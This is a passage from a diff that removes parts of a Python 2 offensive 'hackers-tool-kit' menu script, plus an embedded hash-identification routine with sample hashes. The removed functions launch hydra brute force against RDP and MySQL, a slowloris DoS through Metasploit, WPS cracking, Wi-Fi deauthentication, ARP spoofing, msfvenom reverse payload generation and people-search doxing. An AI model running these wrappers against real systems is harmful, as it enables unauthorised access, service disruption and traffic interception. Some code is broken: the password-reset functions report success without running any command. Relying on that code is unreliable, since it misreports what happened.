+----------------------------+" - print " | RDP Brute Force |" - print " +----------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -t 1 -V -f -l %s -P %s %s rdp" % (user, word, iphost)) - sys.exit() - - elif bhydra == '12': - print - print " +-----------------------------+" - print " | MySQL Brute Force |" - print " +-----------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -t 5 -V -f -l %s -e ns -P %s localhost mysql" % (user, word)) - - elif bhydra == '00' or bhydra == '0': - print "\n[!] Exit the Program..." - sys.exit() - - else: - print "\n[!] ERROR : Wrong Input" - time.sleep(1) - restart_program() -def cupp(): - os.system("cd /root/hackers-tool-kit/wordlists && cupp -i") - print Y+"wordlist saved to /root/hackers-tool-kit/wordlists\033[0m" -def vdir(): - print "\n" - os.system("ls") - print Y+"! doesnt have to be these can be any directory !\033[0m" - print "\n" - h = raw_input("Directory Path: ") - print "\n" - print "--------------------------------------------------------------------------------------------------------------------------------------------" - os.system("ls " + h) - print "--------------------------------------------------------------------------------------------------------------------------------------------" - -def monoff(): - os.system("iwconfig") - i = raw_input("Select Interface: ") - os.system("airmon-ng stop " + i) -def vpn(): - os.system("anonsurf start") - os.system("anonsurf myip") -def vpnoff(): - os.system("anonsurf stop") - os.system("anonsurf myip") -def slowl(): - de = raw_input("Delay: ") - tar = raw_input("RHOST: ") - port = raw_input("RPORT: ") - soc = raw_input("Sockets: ") - os.system('echo "use auxiliary/dos/http/slowloris\n" > slowl.rc') - os.system('echo "set delay {0}\n" >> slowl.rc'.format(de)) - os.system('echo "set RHOST {0}\n" >> slowl.rc'.format(tar)) - os.system('echo "set RPORT {0}\n" >> slowl.rc'.format(port)) - os.system('echo "set sockets {0}\n" >> slowl.rc'.format(soc)) - os.system('echo "run\n" >> slowl.rc') - os.system('msfconsole -r slowl.rc') - os.system('rm -rf slowl.rc') - -def pidox(): - print Y+"! USING FIREFOX !\033[0m" - os.system("sleep 2") - os.system("firefox https://pipl.com/") -def specnet(): - jk = raw_input("BSSID: ") - kj = raw_input("ESSID: ") - os.system("iwconfig") - k = raw_input("INTERFACE: ") - print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" - j = raw_input("[y/n]> ") - if j == "y": - a = 'airodump-ng -w /root/SCAN --bssid {0} --essid {1} {2}'.format(jk,kj,k) - os.system(a) - if j == "n": - a = 'airodump-ng --bssid {0} --essid {1} {2}'.format(jk,kj,k) - os.system(a) -def pingen(): - j = raw_input("Enter BSSID: ") - a = 'cd /root/hackers-tool-kit/tools && python pingen.py {0}'.format(j) - os.system(a) -def reaver(): - os.system("iwconfig") - j = raw_input("Select Interface: ") - k = raw_input("Enter BSSID: ") - a = 'reaver -i {0} -b {1} -vv'.format(j,k) - os.system(a) -def deauth(): - print Y+"! YOU MAY HAVE TO CHANGE YOUR WIFI CHANNEL !\033[0m" - j = raw_input("Enter BSSID> ") - os.system("iwconfig") - k = raw_input("Enter Interface> ") - a = 'aireplay-ng -0 0 -a {0} {1}'.format(j,k) - os.system(a) -def macc(): - os.system("iwconfig") - k = raw_input("Interface: ") - c = 'ifconfig {0} down'.format(k) - os.system(c) - os.system("macchanger -r " + k) - s = 'ifconfig {0} up'.format(k) - os.system(s) -def macoff(): - os.system("iwconfig") - k = raw_input("Interface: ") - c = 'ifconfig {0} down'.format(k) - os.system(c) - os.system("macchanger -p " + k) - s = 'ifconfig {0} up'.format(k) - os.system(s) -def arpspoof(): - print "\033[93mif using multiple targets heres an example: 134.143.1.3, 134.143.1.6\033[0m\n" - h = raw_input("Targets: ") - os.system('echo "net.sniff on\n" >> arp.cap') - os.system('echo "set arp.spoof.targets {0}\n" >> arp.cap'.format(h)) - os.system('echo "arp.spoof on\n" >> arp.cap') - print '\n\033[93mto stop type "exit"\033[0m' - os.system("sleep 2") - os.system("bettercap -no-history -caplet arp.cap") - os.system("rm arp.cap") -def sslscan(): - j = raw_input('Enter Target: ') - a = 'sslscan {0}'.format(j) - os.system(a) -def payload(): - os.system("cat /root/hackers-tool-kit/tools/payloads.txt") - print "\n" - f = raw_input("Select Payload: ") - l = raw_input("LHOST: ") - c = raw_input("LPORT: ") - os.system("cat /root/hackers-tool-kit/tools/formats.txt") - s = raw_input("Format: ") - h = raw_input("File Name: ") - a = 'msfvenom -p {0} LHOST={1} LPORT={2} -f {3} -o /root/{4}.{5}'.format(f,l,c,s,h,s) - os.system(a) -def crunch(): - print "minimal number of characters" - j = raw_input("[CRUNCH]: ") - print "maximum number of characters" - k = raw_input("[CRUNCH]: ") - print "what characters should be in it" - b = raw_input("[CRUNCH]: ") - print "name of file" - s = raw_input("[CRUNCH]: ") - a = 'crunch {0} {1} {2} -o /root/hackers-tool-kit/wordlists/{3}'.format(j,k,b,s) - os.system(a) - print Y+"wordlist saved to \033[0m/root/hackers-tool-kit/wordlists/" + s -def traff(): - os.system("iwconfig") - s = raw_input("Select Interface: ") - os.system("tcpdump -i " + s) -def resa(): - j = raw_input("USERNAME: ") - k = raw_input("NEW PASSWORD: ") - print "are you sure?" - q = raw_input("[y/n]: ") - if q == "n": - os.system("clear") - mainbanner() - if q == "y": - a = 'echo "{0}:{1}" | chpasswd'.format(j,k) - print "password for {0} has been reset".format(j) -def resu(): - j = raw_input("PASSWORD: ") - print "are you sure?" - q = raw_input("[y/n]: ") - if q == "n": - os.system("clear") - mainbanner() - if q == "y": - a = 'passwd {0}'.format(j) - print "unix password has been reset".format(j) -def hashid(): - #!/usr/bin/python - # encoding: utf-8 - # Hash Identifier v1.1 - # By Zion3R - # www.Blackploit.com - # Root@Blackploit.com - - logo=''' ######################################################################### - # __ __ __ ______ _____ # - # /\ \/\ \ /\ \ /\__ _\ /\ _ `\ # - # \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ # - # \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ # - # \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ # - # \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ # - # \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.1 # - # By Zion3R # - # www.Blackploit.com # - # Root@Blackploit.com # - #########################################################################''' - - algorithms={"102020":"ADLER-32", "102040":"CRC-32", "102060":"CRC-32B", "101020":"CRC-16", "101040":"CRC-16-CCITT", "104020":"DES(Unix)", "101060":"FCS-16", "103040":"GHash-32-3", "103020":"GHash-32-5", "115060":"GOST R 34.11-94", "109100":"Haval-160", "109200":"Haval-160(HMAC)", "110040":"Haval-192", "110080":"Haval-192(HMAC)", "114040":"Haval-224", "114080":"Haval-224(HMAC)", "115040":"Haval-256", "115140":"Haval-256(HMAC)", "107080":"Lineage II C4", "106025":"Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))", "102080":"XOR-32", "105060":"MD5(Half)", "105040":"MD5(Middle)", "105020":"MySQL", "107040":"MD5(phpBB3)", "107060":"MD5(Unix)", "107020":"MD5(Wordpress)", "108020":"MD5(APR)", "106160":"Haval-128", "106165":"Haval-128(HMAC)", "106060":"MD2", "106120":"MD2(HMAC)", "106040":"MD4", "106100":"MD4(HMAC)", "106020":"MD5", "106080":"MD5(HMAC)", "106140":"MD5(HMAC(Wordpress))", "106029":"NTLM", "106027":"RAdmin v2.x", "106180":"RipeMD-128", "106185":"RipeMD-128(HMAC)", "106200":"SNEFRU-128", "106205":"SNEFRU-128(HMAC)", "106220":"Tiger-128", "106225":"Tiger-128(HMAC)", "106240":"md5($pass.$salt)", "106260":"md5($salt.'-'.md5($pass))", "106280":"md5($salt.$pass)", "106300":"md5($salt.$pass.$salt)", "106320":"md5($salt.$pass.$username)", "106340":"md5($salt.md5($pass))", "106360":"md5($salt.md5($pass).$salt)", "106380":"md5($salt.md5($pass.$salt))", "106400":"md5($salt.md5($salt.$pass))", "106420":"md5($salt.md5(md5($pass).$salt))", "106440":"md5($username.0.$pass)", "106460":"md5($username.LF.$pass)", "106480":"md5($username.md5($pass).$salt)", "106500":"md5(md5($pass))", "106520":"md5(md5($pass).$salt)", "106540":"md5(md5($pass).md5($salt))", "106560":"md5(md5($salt).$pass)", "106580":"md5(md5($salt).md5($pass))", "106600":"md5(md5($username.$pass).$salt)", "106620":"md5(md5(md5($pass)))", "106640":"md5(md5(md5(md5($pass))))", "106660":"md5(md5(md5(md5(md5($pass)))))", "106680":"md5(sha1($pass))", "106700":"md5(sha1(md5($pass)))", "106720":"md5(sha1(md5(sha1($pass))))", "106740":"md5(strtoupper(md5($pass)))", "109040":"MySQL5 - SHA-1(SHA-1($pass))", "109060":"MySQL 160bit - SHA-1(SHA-1($pass))", "109180":"RipeMD-160(HMAC)", "109120":"RipeMD-160", "109020":"SHA-1", "109140":"SHA-1(HMAC)", "109220":"SHA-1(MaNGOS)", "109240":"SHA-1(MaNGOS2)", "109080":"Tiger-160", "109160":"Tiger-160(HMAC)", "109260":"sha1($pass.$salt)", "109280":"sha1($salt.$pass)", "109300":"sha1($salt.md5($pass))", "109320":"sha1($salt.md5($pass).$salt)", "109340":"sha1($salt.sha1($pass))", "109360":"sha1($salt.sha1($salt.sha1($pass)))", "109380":"sha1($username.$pass)", "109400":"sha1($username.$pass.$salt)", "1094202":"sha1(md5($pass))", "109440":"sha1(md5($pass).$salt)", "109460":"sha1(md5(sha1($pass)))", "109480":"sha1(sha1($pass))", "109500":"sha1(sha1($pass).$salt)", "109520":"sha1(sha1($pass).substr($pass,0,3))", "109540":"sha1(sha1($salt.$pass))", "109560":"sha1(sha1(sha1($pass)))", "109580":"sha1(strtolower($username).$pass)", "110020":"Tiger-192", "110060":"Tiger-192(HMAC)", "112020":"md5($pass.$salt) - Joomla", "113020":"SHA-1(Django)", "114020":"SHA-224", "114060":"SHA-224(HMAC)", "115080":"RipeMD-256", "115160":"RipeMD-256(HMAC)", "115100":"SNEFRU-256", "115180":"SNEFRU-256(HMAC)", "115200":"SHA-256(md5($pass))", "115220":"SHA-256(sha1($pass))", "115020":"SHA-256", "115120":"SHA-256(HMAC)", "116020":"md5($pass.$salt) - Joomla", "116040":"SAM - (LM_hash:NT_hash)", "117020":"SHA-256(Django)", "118020":"RipeMD-320", "118040":"RipeMD-320(HMAC)", "119020":"SHA-384", "119040":"SHA-384(HMAC)", "120020":"SHA-256", "121020":"SHA-384(Django)", "122020":"SHA-512", "122060":"SHA-512(HMAC)", "122040":"Whirlpool", "122080":"Whirlpool(HMAC)"} - - # hash.islower() minusculas - # hash.isdigit() numerico - # hash.isalpha() letras - # hash.isalnum() alfanumerico - - def CRC16(): - hs='4607' - if len(hash)==len(hs) and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("101020") - def CRC16CCITT(): - hs='3d08' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("101040") - def FCS16(): - hs='0e5b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("101060") - - def CRC32(): - hs='b33fd057' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102040") - def ADLER32(): - hs='0607cb42' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102020") - def CRC32B(): - hs='b764a0d9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102060") - def XOR32(): - hs='0000003f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102080") - - def GHash323(): - hs='80000000' - if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("103040") - def GHash325(): - hs='85318985' - if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("103020") - - def DESUnix(): - hs='ZiY8YtDKXJwYQ' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False: - jerar.append("104020") - - def MD5Half(): - hs='ae11fd697ec92c7c' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("105060") - def MD5Middle(): - hs='7ec92c7c98de3fac' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("105040") - def MySQL(): - hs='63cea4673fd25f46' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("105020") - - def DomainCachedCredentials(): - hs='f42005ec1afe77967cbc83dce1b4d714' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106025") - def Haval128(): - hs='d6e3ec49aa0f138a619f27609022df10' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106160") - def Haval128HMAC(): - hs='3ce8b0ffd75bc240fc7d967729cd6637' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106165") - def MD2(): - hs='08bbef4754d98806c373f2cd7d9a43c4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106060") - def MD2HMAC(): - hs='4b61b72ead2b0eb0fa3b8a56556a6dca' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106120") - def MD4(): - hs='a2acde400e61410e79dacbdfc3413151' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106040") - def MD4HMAC(): - hs='6be20b66f2211fe937294c1c95d1cd4f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106100") - def MD5(): - hs='ae11fd697ec92c7c98de3fac23aba525' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106020") - def MD5HMAC(): - hs='d57e43d2c7e397bf788f66541d6fdef9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106080") - def MD5HMACWordpress(): - hs='3f47886719268dfa83468630948228f6' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106140") - def NTLM(): - hs='cc348bace876ea440a28ddaeb9fd3550' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106029") - def RAdminv2x(): - hs='baea31c728cbf0cd548476aa687add4b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106027") - def RipeMD128(): - hs='4985351cd74aff0abc5a75a0c8a54115' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106180") - def RipeMD128HMAC(): - hs='ae1995b931cf4cbcf1ac6fbf1a83d1d3' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106185") - def SNEFRU128(): - hs='4fb58702b617ac4f7ca87ec77b93da8a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106200") - def SNEFRU128HMAC(): - hs='59b2b9dcc7a9a7d089cecf1b83520350' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106205") - def Tiger128(): - hs='c086184486ec6388ff81ec9f23528727' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106220") - def Tiger128HMAC(): - hs='c87032009e7c4b2ea27eb6f99723454b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106225") - def md5passsalt(): - hs='5634cc3b922578434d6e9342ff5913f7' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106240") - def md5saltmd5pass(): - hs='245c5763b95ba42d4b02d44bbcd916f1' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106260") - def md5saltpass(): - hs='22cc5ce1a1ef747cd3fa06106c148dfa' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106280") - def md5saltpasssalt(): - hs='469e9cdcaff745460595a7a386c4db0c' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106300") - def md5saltpassusername(): - hs='9ae20f88189f6e3a62711608ddb6f5fd' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106320") - def md5saltmd5pass(): - hs='aca2a052962b2564027ee62933d2382f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106340") - def md5saltmd5passsalt(): - hs='de0237dc03a8efdf6552fbe7788b2fdd' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106360") - def md5saltmd5passsalt(): - hs='5b8b12ca69d3e7b2a3e2308e7bef3e6f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106380") - def md5saltmd5saltpass(): - hs='d8f3b3f004d387086aae24326b575b23' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106400") - def md5saltmd5md5passsalt(): - hs='81f181454e23319779b03d74d062b1a2' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106420") - def md5username0pass(): - hs='e44a60f8f2106492ae16581c91edb3ba' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106440") - def md5usernameLFpass(): - hs='654741780db415732eaee12b1b909119' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106460") - def md5usernamemd5passsalt(): - hs='954ac5505fd1843bbb97d1b2cda0b98f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106480") - def md5md5pass(): - hs='a96103d267d024583d5565436e52dfb3' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106500") - def md5md5passsalt(): - hs='5848c73c2482d3c2c7b6af134ed8dd89' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106520") - def md5md5passmd5salt(): - hs='8dc71ef37197b2edba02d48c30217b32' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106540") - def md5md5saltpass(): - hs='9032fabd905e273b9ceb1e124631bd67' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106560") - def md5md5saltmd5pass(): - hs='8966f37dbb4aca377a71a9d3d09cd1ac' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106580") - def md5md5usernamepasssalt(): - hs='4319a3befce729b34c3105dbc29d0c40' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106600") - def md5md5md5pass(): - hs='ea086739755920e732d0f4d8c1b6ad8d' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106620") - def md5md5md5md5pass(): - hs='02528c1f2ed8ac7d83fe76f3cf1c133f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106640") - def md5md5md5md5md5pass(): - hs='4548d2c062933dff53928fd4ae427fc0' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106660") - def md5sha1pass(): - hs='cb4ebaaedfd536d965c452d9569a6b1e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106680") - def md5sha1md5pass(): - hs='099b8a59795e07c334a696a10c0ebce0' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106700") - def md5sha1md5sha1pass(): - hs='06e4af76833da7cc138d90602ef80070' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106720") - def md5strtouppermd5pass(): - hs='519de146f1a658ab5e5e2aa9b7d2eec8' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106740") - - def LineageIIC4(): - hs='0x49a57f66bd3d5ba6abda5579c264a0e4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True and hash[0:2].find('0x')==0: - jerar.append("107080") - def MD5phpBB3(): - hs='$H$9kyOtE8CDqMJ44yfn9PFz2E.L2oVzL1' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$H$')==0: - jerar.append("107040") - def MD5Unix(): - hs='$1$cTuJH0Ju$1J8rI.mJReeMvpKUZbSlY/' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$1$')==0: - jerar.append("107060") - def MD5Wordpress(): - hs='$P$BiTOhOj3ukMgCci2juN0HRbCdDRqeh.' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$P$')==0: - jerar.append("107020") - - def MD5APR(): - hs='$apr1$qAUKoKlG$3LuCncByN76eLxZAh/Ldr1' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash[0:4].find('$apr')==0: - jerar.append("108020") - - def Haval160(): - hs='a106e921284dd69dad06192a4411ec32fce83dbb' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109100") - def Haval160HMAC(): - hs='29206f83edc1d6c3f680ff11276ec20642881243' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109200") - def MySQL5(): - hs='9bb2fb57063821c762cc009f7584ddae9da431ff' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109040") - def MySQL160bit(): - hs='*2470c0c06dee42fd1618bb99005adca2ec9d1e19' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:1].find('*')==0: - jerar.append("109060") - def RipeMD160(): - hs='dc65552812c66997ea7320ddfb51f5625d74721b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109120") - def RipeMD160HMAC(): - hs='ca28af47653b4f21e96c1235984cb50229331359' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109180") - def SHA1(): - hs='4a1d4dbc1e193ec3ab2e9213876ceb8f4db72333' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109020") - def SHA1HMAC(): - hs='6f5daac3fee96ba1382a09b1ba326ca73dccf9e7' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109140") - def SHA1MaNGOS(): - hs='a2c0cdb6d1ebd1b9f85c6e25e0f8732e88f02f96' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109220") - def SHA1MaNGOS2(): - hs='644a29679136e09d0bd99dfd9e8c5be84108b5fd' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109240") - def Tiger160(): - hs='c086184486ec6388ff81ec9f235287270429b225' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109080") - def Tiger160HMAC(): - hs='6603161719da5e56e1866e4f61f79496334e6a10' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109160") - def sha1passsalt(): - hs='f006a1863663c21c541c8d600355abfeeaadb5e4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109260") - def sha1saltpass(): - hs='299c3d65a0dcab1fc38421783d64d0ecf4113448' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109280") - def sha1saltmd5pass(): - hs='860465ede0625deebb4fbbedcb0db9dc65faec30' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109300") - def sha1saltmd5passsalt(): - hs='6716d047c98c25a9c2cc54ee6134c73e6315a0ff' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109320") - def sha1saltsha1pass(): - hs='58714327f9407097c64032a2fd5bff3a260cb85f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109340") - def sha1saltsha1saltsha1pass(): - hs='cc600a2903130c945aa178396910135cc7f93c63' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109360") - def sha1usernamepass(): - hs='3de3d8093bf04b8eb5f595bc2da3f37358522c9f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109380") - def sha1usernamepasssalt(): - hs='00025111b3c4d0ac1635558ce2393f77e94770c5' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109400") - def sha1md5pass(): - hs='fa960056c0dea57de94776d3759fb555a15cae87' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("1094202") - def sha1md5passsalt(): - hs='1dad2b71432d83312e61d25aeb627593295bcc9a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109440") - def sha1md5sha1pass(): - hs='8bceaeed74c17571c15cdb9494e992db3c263695' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109460") - def sha1sha1pass(): - hs='3109b810188fcde0900f9907d2ebcaa10277d10e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109480") - def sha1sha1passsalt(): - hs='780d43fa11693b61875321b6b54905ee488d7760' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109500") - def sha1sha1passsubstrpass03(): - hs='5ed6bc680b59c580db4a38df307bd4621759324e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109520") - def sha1sha1saltpass(): - hs='70506bac605485b4143ca114cbd4a3580d76a413' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109540") - def sha1sha1sha1pass(): - hs='3328ee2a3b4bf41805bd6aab8e894a992fa91549' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109560") - def sha1strtolowerusernamepass(): - hs='79f575543061e158c2da3799f999eb7c95261f07' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109580") - - def Haval192(): - hs='cd3a90a3bebd3fa6b6797eba5dab8441f16a7dfa96c6e641' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110040") - def Haval192HMAC(): - hs='39b4d8ecf70534e2fd86bb04a877d01dbf9387e640366029' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110080") - def Tiger192(): - hs='c086184486ec6388ff81ec9f235287270429b2253b248a70' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110020") - def Tiger192HMAC(): - hs='8e914bb64353d4d29ab680e693272d0bd38023afa3943a41' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110060") - - def MD5passsaltjoomla1(): - hs='35d1c0d69a2df62be2df13b087343dc9:BeKMviAfcXeTPTlX' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: - jerar.append("112020") - - def SHA1Django(): - hs='sha1$Zion3R$299c3d65a0dcab1fc38421783d64d0ecf4113448' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:5].find('sha1$')==0: - jerar.append("113020") - - def Haval224(): - hs='f65d3c0ef6c56f4c74ea884815414c24dbf0195635b550f47eac651a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114040") - def Haval224HMAC(): - hs='f10de2518a9f7aed5cf09b455112114d18487f0c894e349c3c76a681' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114080") - def 